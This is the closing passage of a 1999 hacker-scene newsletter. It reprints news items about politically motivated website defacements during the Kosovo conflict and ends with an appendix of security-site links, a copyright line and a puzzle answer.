      is no April Fools here.

     Hack details from HNS http://net-security.org/ - Help Net Security

     by BHZ, Sunday 28th Mar 1999 on 1:00 am CET
     Well soon after that pro-yu hack, Hackers Against Communism Klan strike the page
     of Chinese goverment - http://www.landbridge.gov.cn. They put a message against
     president of Yugoslavia Slobodan Milosevic. The page stated:"I was wondering why
     an intelligent human creature would support an idiotic dictator like Slobodan Milosevic
     ? And I still can't find the answer. He is responsible for hundreds of death's in Kosovo,
     he is nothing more then a Murderer yet he is supported by Hackers. Hackers lost
     their and ethics now they lost their sense of justice. I understand that somebody hate
     U.S. or NATO... that's OK, but this is not an excuse to support terrorist dictators like
     Slobodan Milosevic. Wake up brothers ! He is a dictator and if we don't stop him, he
     will became another Adolph Hitler. And this is the last thing we need right now! Now
     you're gonna ask me why I'm telling all this stuff on a Chinese gov server. Well I don't
     think I could find a serbian gov site these days and China is supporting the Serb
     president so I don't think they gonna mind if I publish my opinion on their site.
     by BHZ, Saturday 27th Mar 1999 on 9:56 pm CET
     As you know, NATO forces are fighting against Yugoslavia. Well some hack groups
     are against it. http://nmimc1.med.navy.mil was hacked and replaced with anti-NATO
     images. Page stated "Russian hackers demand to stop terrorist aggression against
     See archive of the hack here. 
     Archive (HNS)
     by BHZ, Sunday 28th Mar 1999 on 3:23 am CET
     Cataharsys is back. After Webfringe and Hack City, they hit The Argon
     -www.theargon.com. So what site will be owned next? Contributed by WHiTe VaMPiRe.
     by BHZ, Monday 29th Mar 1999 on 2:36 pm CET
     Hm, I can say this in one sentence - Catharsys again... 
     Archive here. 

     by BHZ, Monday 29th Mar 1999 on 10:45 pm CET
     Who are they? They cam from anonymity to profile of 5 popular underground sites.
     Yes 5. www.hackedworld.com was hacked today. This hacks are covered with some
     suspicion about the way of servers were hacked... BTW as catharsys said that their
     biggest hack is coming, they posted a message to Hacked World webboard saying
     that Antionline.com is next...


  A.0                              APPENDICES

  A.1  PHACVW, sekurity, security, cyberwar links

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)

      Hacker's Jargon File (The quote file)
      Original jargon file

      New Hacker's Jargon File.
      New jargon file
      Featured site:
      ...... Interesting site check it out, nice
             layout, cool format, cool info.

      International links:(TBC)

      Foreign correspondants and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      Belgium.......: http://bewoner.dma.be/cum/              Go there 
      Brasil........: http://www.psynet.net/ka0z              Go there
                      http://www.elementais.cjb.net           Go there
      Columbia......: http://www.cascabel.8m.com              Go there
                      http://www.intrusos.cjb.net             Go there
      Indonesia.....: http://www.k-elektronik.org/index2.html Go there
                      http://members.xoom.com/neblonica/      Go there
                      http://hackerlink.or.id/                Go there
      Netherlands...: http://security.pine.nl/                Go there       
      Russia........: http://www.tsu.ru/~eugene/              Go there
      Singapore.....: http://www.icepoint.com                 Go there

    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.



    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news  (R) { w00t }
    Puzzle answer:  0-1" (the cards are touching.)
                    if the drop in the cable is 25', maximum cable length
                    without a repeater is 50' for standard ethernet coax
                    so therefore the drawing is inaccurate and the cards 
                    are face to face, the thickness of the cable not taken
                    into account.

   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]